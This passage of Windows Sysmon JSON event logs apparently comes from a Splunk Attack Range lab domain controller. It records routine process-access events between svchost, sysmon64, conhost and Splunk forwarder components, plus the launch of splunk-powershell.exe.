\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5793,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:51.643\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-036F-5F25-0000-0010FBDE0A00}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:51.643","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-036F-5F25-0000-0010FBDE0A00}","TargetProcessId":"2284","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.128\r\nProcessGuid: {A837DB8D-0371-5F25-0000-0010EEE00A00}\r\nProcessId: 3788\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 